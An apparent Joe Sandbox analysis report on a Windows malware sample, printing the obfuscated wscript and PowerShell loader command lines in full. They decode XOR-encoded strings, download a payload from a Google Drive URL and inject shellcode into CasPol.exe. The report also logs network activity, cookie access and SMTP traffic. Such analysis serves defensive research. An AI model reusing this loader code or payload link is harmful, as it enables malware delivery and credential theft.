S`$PlEmolRoe Av OaCitHeoSprTrf NoBk7Or)De Ra`$RaF SaVigTigSyrAru Dp PpSs8Et;Le`$AbM AoCunStePoyAasVaa uvQu2 A0ve7St2In= I`$ BMNeoAnn Ue Ey osJoa EvPr2Sa0 E7Im2 A+Ud' N\ LWFriScn LeHetAr.TuT SeSecUn'Ka;Sk`$InK BoAfmHom baPan FdInrAfk DaEr=Re' B' N; Wi BfTo F(Uk- TnFlo At S( GTIaeResSmtBr- DP Sa ut Ih H me`$PrMNioTenLie DyMas Va TvDi2 C0 H7 B2Ha)Sn) N Ak{SkwArhCai LlHuePo Ho( R`$ SKNoo Sm Um Ha SnGad TrenkPeaDo De- PeInqRv T' U' K)Pi Fo{ S& c( K`$SeEMelMoe Hvmaa Yt BoParasfBoo C7Wo)Pu R`$MeK FoFonSusRet T0 T0 S;Md& E( P`$ PEtvlGre Tv HaFlt CoInr ifYdoCy7 T) R Pi( FKBeo Mncasstt V0 F2Id ge'TeCAl8 SE FFLaF OA OE K9JuE GF TB S6 sC S8prF M7RyFedE RF AEGaEOvB YB LB RAPeE V'Pe)Ca;Ma}FiSSveFetEl-VaCSvo VnNotDye CnKotpe Cl`$stM yoTrnRee Vypes AaNiv F2Po0 T7 U2 T U`$MaKsaoAlm RmAnaFan RdMer Tk ka D; H}Ab`$JeKpaoBrm EmUna An SdPrr UkHyaKu O= C KaGTee CtXa-ReCamoRon Ut SeSon ct P Zi`$frM CoVinRee Oy ks vaPsv A2 B0 M7Ph2Ni;Fr`$PrFmia KgFag SrImuSlp Ap A9Me Rn=Hj dK SoTan VsMetSe0ak2Ad Sk' BBImFCoDreD BFPrAKuFskCExFTrC SEPo9 BESoE NESpB fEPuBSkBRaBKoADe6AfBHaB OCXa0ThC F8SeEBu2wlESt8BlEnyFCeFSkE FF P6 PB F5TmDBr8 AFUn4BrFKe5 ME pDPaF OEPoESi9 SEPaF UCBl6BoA C1DrA E1trDLaD KEIn9ScFAn4 SFBa6LuD U9MaFPhA AE W8 PFChE OA PD tA DFAmCFe8ReEUnF VEPr9 kFTr2EnFFa5AbFsyC RB H3 YBVeFSpDAf0SlF O4SiF P6 RF M6ArF SAHoFSp5ClF IF BE B9 DFPo0StF MA gBSu2 P'Ul;Sh& U(Hy`$SpE Pl PeHev Ua TtBroBlr ufHjoAl7Mi)Av Be`$ rFEvaBrg Rg Cr PuFupCop t9Hy; V`$TiKProMom Bm SaTon Cdobr hkOvaSt0An So=Bi ElKKoo PnbasFat R0 F2St Ek' CCOu0 AC F8DaEIl2SpEFl8 sEKuFLaFReEFoFDr6CoB C5StC U9SeEFoE OFNe5UnE BFEjF S2CrFUp6WhFOdE TBMa5UnDFe2ceF S5 FEBeFRoFTiEviENe9 TFSu4 CE UBFiC O8EnF UEFiE L9boE UDcrFar2GuFBe8 RFKlEReETa8noBEr5MaDHa6chFupAPlEAu9UnEMi8AtF S3SuFElA rF G7 KC V6 RA U1 SA K1DaD D8MeFSt4LiE OBEpETo2AkB C3TiB pF BDEuDUgFanA KF lCtrFlyCOvEAc9LeE iE uEArBRiE FBKaBAv7CaBRuB OAOsBExB u7HaBPoB GB RB uBSaFnoDNe6ApFPr4 mFEv5ToFSeEUnE M2GrEam8 DFDeA LE BDunA M9 BA RBMaAPrCMiARe8 TB M7ApBKkB KA MD FA CE DA OB OBNy2Fr'Bi;at&Ta(Me`$GsETrl Ke Bv SaOvtIoo ArgyfDaoFl7De)In P`$ KKFoosvmGrm Ma EntidKirSikTya D0Sa;Ud`$DuMPro PtMsoBrrhe= O`$ MFUnaPagargBlrJau ApPrp D. ScCoo Tu LnOvtRd-Ko6 T5 F0 R; j`$BaK Lo DmUnm SaHun Ed OrSwkPraSt1Ca In= S LoKPeo PnBlsKftSc0Ki2 S Pe' DC F0EnCKl8toEOv2 AEUn8 PE PF FF MEcoF K6TeBFl5DiCEf9DeEIoE HF D5 AE SFPiFSt2AdFOv6deFOpEUdB R5 TD S2AnFfu5 GEPlFAnF lEJoETa9 SF T4InEMeBIdCBr8 DFTyE DESg9GlEKeD KF T2deFBr8StFMaESlELe8 SBRa5 VD O6SpFInA RE S9PiEfo8RaFSo3AgF SA BF N7anC P6 UAVg1StAMb1 FDTa8ViFru4CaEBrBAmEUr2 mB O3FjBGeF OD ADFrFReAAmF DCGuFgoCAdE t9inEDaE SETiB MEEsBRaB M7 FB NBNoA aDAdAcoE RAPoBSkBDr7FoB SBMiBGrFFuDfyF SFPhENiESy8FoESlF OBUn7FoBudBCaBBoF MDMy6InFMa4 DEFlFSnF B4ReEDu9 MBPa2Ko' P;Oc&Di( S`$PoESel Me tv FasutPio gr KfVioUn7 G)ar An`$ SKNyo AmSpmAfaAcn Kd Tr ekBraPr1 B;Sp`$paKStoLim SmWha DnWod SrUnk pa B2Pr h= A MiKPro Un IsRetBe0 S2 E le' GBVdF BEGe9 AFFoEPrFCi6BuFSp2FuE H8KlE B8 OB LBPaACo6ToB AB CC C0EvCAn8 aE R2StEfi8DiEChFNoF CEEsFbi6SlB O5euCAf9paEkoEInF K5 FEFaFLeFBl2 TFWo6 SFUnENoBYe5PaDPe2RaF S5CoE dF FF HE IE T9 TFMi4 GE BBAnC T8 gFInEPeE B9 AEKeD TF E2FoFGi8ArFLeENdE F8orBov5 PD C6StFToANoESt9AuE b8 OF S3ElFpiAChF F7tiCIn6SyA A1 GA F1obD VCEuFNeESeE BF UDCiFVaF KE RF R7BaFdeECyFTiC AFCoAOuEOmF KFOvE vD SDAdFTo4RoE S9KlDSkDfrEUmESvF B5raF C8CoEPrF PF p2AdF D4 lF S5 BC CBudFTr4ArFAc2SaFKl5 KE AF FFByEKrE M9ThB U3 GBIm3 CFMeD BFKa0ReE TBfoBBaBTaBpeFUdCKaD KF vAUnEMeFPsEReFupE ABKoEDaB bF KE BBPaBSpBCeF GD qF UF FEToE BDBoFIn2 FF I7 RF BESiFMgFPrFSt1HoBPo2 KBPr7 TBAcB OBHa3whD CCumDCyFDiCMoFNoBUnBDiD DB DB S3PlCKe0PyD m2ReF L5OsEPaF FCHoBObEBlF SE a9MaC B6 HBNi7StBUnBHaCFr0spD S2 DF V5VeE FFwiC HB TEDeF SEan9 BC a6peB T7frBEjB mC R0 sD L2LeFId5AvEBuFPaCInBVrEMyFLuE C9OpCMa6 OB V7SaB sB ACUn0 PD M2CrFFo5 BEAfF BC SB BEslFPaE R9 KC P6UnB R7 PBNoB CC T0PeD C2 SF E5DeE BFKoC WBSkE FFLeEUl9StCNo6NiBUn2RuBUdBKaB R3 SC s0HoDSl2AaFHa5OsEdmF NCHuBTrE FFMaESt9AbCOm6 MB D2 FBMa2 GBGe2Ma'Sa;He& T(Gg`$DrELylToeOvvStaDit LoAnr dfSeoSk7 K)Ri R`$GuK To Mm PmCeaLnnSvd BrBek caAd2Fj; F`$ CK poMumPom Ta SnSpdanrInkLoavk3Sy Fu= v CeKInoMen Cs Ht V0Sp2Ju T'SiBZoFWoE E9DiFReEMoF E6ReFSl2SaE D8SuEOt8KaBFo5PrDVe2inFTi5 BEBoDVaF A4InFLm0PeFSkE SBUn3UnB SF LDSk6 WFUl4voFFl5MeFBaE FE L2ChEIn8EuF AAFiE UD PAAc9AtA LBTiA CCSiA S8 SB A7PaBSpF ID HFseF BE SEDo8CuEExFThBRu7SkBVmFPrC HEBlFLo5KuFSo9ToF I4 LFHiFsoESe2ScETu8 SFAs0SuB S7 hA sBSaBMa7SkA SBSaBOv2 F' F;Si&pi(To`$BiE blomeEuvFaaPat aoSprSkf Ko F7No)Hy Mu`$ FK AoMam SmVaa Pn Md FrChk FaKi3Sk# C;""";Function Kommandrka9 ([String]$Paatryknin201) { For($Spag=2; $Spag -lt $Paatryknin201.Length-1; $Spag+=(2+1)){$Konst = $Konst + $Paatryknin201.Substring($Spag, 1)}; $Konst;}$Jnkep0 = Kommandrka9 'WhI UEDuXRo ';$Jnkep1= Kommandrka9 $Boykott;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Po*er*\v1.0\*ll.e*e $Jnkep1 ;}else{&$Jnkep0 $Jnkep1;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5732 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Konst02 { param([String]$Paatryknin201); $Fonetik134 = ''; Write-Host $Fonetik134; Write-Host $Fonetik134; Write-Host $Fonetik134; $Bdel222 = New-Object byte[] ($Paatryknin201.Length / 2); For($Spag=0; $Spag -lt $Paatryknin201.Length; $Spag+=2){ $Bdel222[$Spag/2] = [convert]::ToByte($Paatryknin201.Substring($Spag, 2), 16); $Bdel222[$Spag/2] = ($Bdel222[$Spag/2] -bxor 155); } [String][System.Text.Encoding]::ASCII.GetString($Bdel222);}$Demog0=Konst02 'C8E2E8EFFEF6B5FFF7F7';$Demog1=Konst02 'D6F2F8E9F4E8F4FDEFB5CCF2F5A8A9B5CEF5E8FAFDFED5FAEFF2EDFED6FEEFF3F4FFE8';$Demog2=Konst02 'DCFEEFCBE9F4F8DAFFFFE9FEE8E8';$Demog3=Konst02 'C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFD';$Demog4=Konst02 'E8EFE9F2F5FC';$Demog5=Konst02 'DCFEEFD6F4FFEEF7FED3FAF5FFF7FE';$Demog6=Konst02 'C9CFC8EBFEF8F2FAF7D5FAF6FEB7BBD3F2FFFED9E2C8F2FCB7BBCBEEF9F7F2F8';$Demog7=Konst02 'C9EEF5EFF2F6FEB7BBD6FAF5FAFCFEFF';$Demog8=Konst02 'C9FEFDF7FEF8EFFEFFDFFEF7FEFCFAEFFE';$Demog9=Konst02 'D2F5D6FEF6F4E9E2D6F4FFEEF7FE';$Elevatorfo0=Konst02 'D6E2DFFEF7FEFCFAEFFECFE2EBFE';$Elevatorfo1=Konst02 'D8F7FAE8E8B7BBCBEEF9F7F2F8B7BBC8FEFAF7FEFFB7BBDAF5E8F2D8F7FAE8E8B7BBDAEEEFF4D8F7FAE8E8';$Elevatorfo2=Konst02 'D2F5EDF4F0FE';$Elevatorfo3=Konst02 'CBEEF9F7F2F8B7BBD3F2FFFED9E2C8F2FCB7BBD5FEECC8F7F4EFB7BBCDF2E9EFEEFAF7';$Elevatorfo4=Konst02 'CDF2E9EFEEFAF7DAF7F7F4F8';$Elevatorfo5=Konst02 'F5EFFFF7F7';$Elevatorfo6=Konst02 'D5EFCBE9F4EFFEF8EFCDF2E9EFEEFAF7D6FEF6F4E9E2';$Elevatorfo7=Konst02 'D2DEC3';$Elevatorfo8=Konst02 'C7';$Vattppe=Konst02 'CEC8DEC9A8A9';$Deviledj=Konst02 'D8FAF7F7CCF2F5FFF4ECCBE9F4F8DA';function fkp {Param ($Kominternf, $Back) ;$Faggrupp0 =Konst02 'BFCDFAE9F6F9BBA6BBB3C0DAEBEBDFF4F6FAF2F5C6A1A1D8EEE9E9FEF5EFDFF4F6FAF2F5B5DCFEEFDAE8E8FEF6F9F7F2FEE8B3B2BBE7BBCCF3FEE9FEB6D4F9F1FEF8EFBBE0BBBFC4B5DCF7F4F9FAF7DAE8E8FEF6F9F7E2D8FAF8F3FEBBB6DAF5FFBBBFC4B5D7F4F8FAEFF2F4F5B5C8EBF7F2EFB3BFDEF7FEEDFAEFF4E9FDF4A3B2C0B6AAC6B5DEEAEEFAF7E8B3BFDFFEF6F4FCABB2BBE6B2B5DCFEEFCFE2EBFEB3BFDFFEF6F4FCAAB2';&($Elevatorfo7) $Faggrupp0;$Faggrupp5 = Konst02 'BFDDF7FAFCFCFEF7BBA6BBBFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCA9B7BBC0CFE2EBFEC0C6C6BBDBB3BFDFFEF6F4FCA8B7BBBFDFFEF6F4FCAFB2B2';&($Elevatorfo7) $Faggrupp5;$Faggrupp1 = Konst02 'E9FEEFEEE9F5BBBFDDF7FAFCFCFEF7B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDC6B3D5FEECB6D4F9F1FEF8EFBBC8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDB3B3D5FEECB6D4F9F1FEF8EFBBD2F5EFCBEFE9B2B7BBB3BFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCAEB2B2B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3BFD0F4F6F2F5EFFEE9F5FDB2B2B2B2B7BBBFD9FAF8F0B2B2';&($Elevatorfo7) $Faggrupp1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicof,[Parameter(Position = 1)] [Type] $Medplanbli = [Void]);$Faggrupp2 = Konst02 'BFD0E9E2FFE8FDF2BBA6BBC0DAEBEBDFF4F6FAF2F5C6A1A1D8EEE9E9FEF5EFDFF4F6FAF2F5B5DFFEFDF2F5FEDFE2F5FAF6F2F8DAE8E8FEF6F9F7E2B3B3D5FEECB6D4F9F1FEF8EFBBC8E2E8EFFEF6B5C9FEFDF7FEF8EFF2F4F5B5DAE8E8FEF6F9F7E2D5FAF6FEB3BFDFFEF6F4FCA3B2B2B7BBC0C8E2E8EFFEF6B5C9FEFDF7FEF8EFF2F4F5B5DEF6F2EFB5DAE8E8FEF6F9F7E2D9EEF2F7FFFEE9DAF8F8FEE8E8C6A1A1C9EEF5B2B5DFFEFDF2F5FEDFE2F5FAF6F2F8D6F4FFEEF7FEB3BFDFFEF6F4FCA2B7BBBFFDFAF7E8FEB2B5DFFEFDF2F5FECFE2EBFEB3BFDEF7FEEDFAEFF4E9FDF4ABB7BBBFDEF7FEEDFAEFF4E9FDF4AAB7BBC0C8E2E8EFFEF6B5D6EEF7EFF2F8FAE8EFDFFEF7FEFCFAEFFEC6B2';&($Elevatorfo7) $Faggrupp2;$Faggrupp3 = Konst02 'BFD0E9E2FFE8FDF2B5DFFEFDF2F5FED8F4F5E8EFE9EEF8EFF4E9B3BFDFFEF6F4FCADB7BBC0C8E2E8EFFEF6B5C9FEFDF7FEF8EFF2F4F5B5D8FAF7F7F2F5FCD8F4F5EDFEF5EFF2F4F5E8C6A1A1C8EFFAF5FFFAE9FFB7BBBFD6FEFFF2F8F4FDB2B5C8FEEFD2F6EBF7FEF6FEF5EFFAEFF2F4F5DDF7FAFCE8B3BFDFFEF6F4FCACB2';&($Elevatorfo7) $Faggrupp3;$Faggrupp4 = Konst02 'BFD0E9E2FFE8FDF2B5DFFEFDF2F5FED6FEEFF3F4FFB3BFDEF7FEEDFAEFF4E9FDF4A9B7BBBFDEF7FEEDFAEFF4E9FDF4A8B7BBBFD6FEFFEBF7FAF5F9F7F2B7BBBFD6FEFFF2F8F4FDB2B5C8FEEFD2F6EBF7FEF6FEF5EFFAEFF2F4F5DDF7FAFCE8B3BFDFFEF6F4FCACB2';&($Elevatorfo7) $Faggrupp4;$Faggrupp5 = Konst02 'E9FEEFEEE9F5BBBFD0E9E2FFE8FDF2B5D8E9FEFAEFFECFE2EBFEB3B2';&($Elevatorfo7) $Faggrupp5 ;}$Iranian = Konst02 'F0FEE9F5FEF7A8A9';$Faggrupp6 = Konst02 'BFDCF7EEF6EBF2BBA6BBC0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1DCFEEFDFFEF7FEFCFAEFFEDDF4E9DDEEF5F8EFF2F4F5CBF4F2F5EFFEE9B3B3FDF0EBBBBFD2E9FAF5F2FAF5BBBFDEF7FEEDFAEFF4E9FDF4AFB2B7BBB3DCDFCFBBDBB3C0D2F5EFCBEFE9C6B7BBC0CED2F5EFA8A9C6B7BBC0CED2F5EFA8A9C6B7BBC0CED2F5EFA8A9C6B2BBB3C0D2F5EFCBEFE9C6B2B2B2';&($Elevatorfo7) $Faggrupp6;$Unbodysk = fkp $Elevatorfo5 $Elevatorfo6;$Faggrupp7 = Konst02 'BFD6F4F5FEE2E8FAEDA9ABACA8BBA6BBBFDCF7EEF6EBF2B5D2F5EDF4F0FEB3C0D2F5EFCBEFE9C6A1A1C1FEE9F4B7BBADAEABB7BBABE3A8ABABABB7BBABE3AFABB2';&($Elevatorfo7) $Faggrupp7;$Faggrupp8 = Konst02 'BFDFFEE8EFBBA6BBBFDCF7EEF6EBF2B5D2F5EDF4F0FEB3C0D2F5EFCBEFE9C6A1A1C1FEE9F4B7BBACACACAAA8AFABA3B7BBABE3A8ABABABB7BBABE3AFB2';&($Elevatorfo7) $Faggrupp8;$Konst01 = 'https://drive.google.com/uc?export=download&id=1ImsPjLy7QqLaprcBEvqIu0wU4k4KAVmk';$Konst00 = Konst02 'BFD0F4F6F6FAF5FFE9F0FABBA6BBB3D5FEECB6D4F9F1FEF8EFBBD5FEEFB5CCFEF9D8F7F2FEF5EFB2B5DFF4ECF5F7F4FAFFC8EFE9F2F5FCB3BFD0F4F5E8EFABAAB2';$Faggrupp8 = Konst02 'BFD6F4F5FEE2E8FAEDA9ABACA9A6BFFEF5EDA1FAEBEBFFFAEFFA';&($Elevatorfo7) $Faggrupp8;$Moneysav2072=$Moneysav2072+'\Winet.Tec';$Kommandrka='';if (-not(Test-Path $Moneysav2072)) {while ($Kommandrka -eq '') {&($Elevatorfo7) $Konst00;&($Elevatorfo7) (Konst02 'C8EFFAE9EFB6C8F7FEFEEBBBAE');}Set-Content $Moneysav2072 $Kommandrka;}$Kommandrka = Get-Content $Moneysav2072;$Faggrupp9 = Konst02 'BFDDFAFCFCE9EEEBEBBBA6BBC0C8E2E8EFFEF6B5D8F4F5EDFEE9EFC6A1A1DDE9F4F6D9FAE8FEADAFC8EFE9F2F5FCB3BFD0F4F6F6FAF5FFE9F0FAB2';&($Elevatorfo7) $Faggrupp9;$Kommandrka0 = Konst02 'C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1D8F4EBE2B3BFDDFAFCFCE9EEEBEBB7BBABB7BBBBBFD6F4F5FEE2E8FAEDA9ABACA8B7BBADAEABB2';&($Elevatorfo7) $Kommandrka0;$Motor=$Faggrupp.count-650;$Kommandrka1 = Konst02 'C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1D8F4EBE2B3BFDDFAFCFCE9EEEBEBB7BBADAEABB7BBBFDFFEE8EFB7BBBFD6F4EFF4E9B2';&($Elevatorfo7) $Kommandrka1;$Kommandrka2 = Konst02 'BFE9FEF6F2E8E8BBA6BBC0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1DCFEEFDFFEF7FEFCFAEFFEDDF4E9DDEEF5F8EFF2F4F5CBF4F2F5EFFEE9B3B3FDF0EBBBBFCDFAEFEFEBEBFEBBBFDFFEEDF2F7FEFFF1B2B7BBB3DCDFCFBBDBB3C0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B2BBB3C0D2F5EFCBEFE9C6B2B2B2';&($Elevatorfo7) $Kommandrka2;$Kommandrka3 = Konst02 'BFE9FEF6F2E8E8B5D2F5EDF4F0FEB3BFD6F4F5FEE2E8FAEDA9ABACA8B7BFDFFEE8EFB7BFCEF5F9F4FFE2E8F0B7ABB7ABB2';&($Elevatorfo7) $Kommandrka3# MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • CasPol.exe (PID: 1784 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.11.20:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.11.20:49809 version: TLS 1.2

Networking

barindex
May check the online IP address of the machine
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ImsPjLy7QqLaprcBEvqIu0wU4k4KAVmk HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/28h7hnips76btsibg57lgmgj73ftidkn/1678713000000/13880735354025239062/*/1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa?e=download&uuid=92dd0e3d-baea-43aa-a822-2534961c9412 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-6g-docs.googleusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficTCP traffic: 192.168.11.20:49816 -> 95.172.86.31:587
Source: global trafficTCP traffic: 192.168.11.20:49816 -> 95.172.86.31:587
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000000D.00000003.2224628306.0000000024106000.00000004.00000020.00020000.00000000.sdmp, Cookies.13.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.13.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000000.00000003.1847556963.000002516CCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000000.00000002.2151983357.000002516AE79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1870943347.000002516AE78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1873141758.000002516AE79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.1847556963.000002516CCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.2151983357.000002516AE79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1870943347.000002516AE78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1873141758.000002516AE79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2209243762.0000018B734DF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000D.00000003.2150804833.0000000005A54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000000.00000002.2151983357.000002516AE79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1870943347.000002516AE78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1873141758.000002516AE79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2209243762.0000018B73486000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000D.00000003.2150804833.0000000005A54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.1847556963.000002516CCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wscript.exe, 00000000.00000002.2151983357.000002516AE79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1870943347.000002516AE78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1873141758.000002516AE79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.1847556963.000002516CCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wscript.exe, 00000000.00000003.1851747216.000002516CE33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1871898873.000002516AE39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2151890491.000002516AE67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2152776966.000002516CDC0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1871898873.000002516AE39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2151890491.000002516AE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enI
Source: wscript.exe, 00000000.00000003.1847556963.000002516CCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.1847556963.000002516CCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000000.00000002.2151983357.000002516AE79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1870943347.000002516AE78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1873141758.000002516AE79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000007.00000002.2180770146.0000018B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2180770146.0000018B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: CasPol.exe, 0000000D.00000003.2154966880.0000000005A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-6g-docs.googleusercontent.com/
Source: CasPol.exe, 0000000D.00000003.2150804833.0000000005A54000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000D.00000003.2154966880.0000000005A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-6g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/28h7hnip
Source: powershell.exe, 00000007.00000003.2177788820.0000018B73BD6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B0059E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B00387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B002CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B004D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B00653000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B004CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 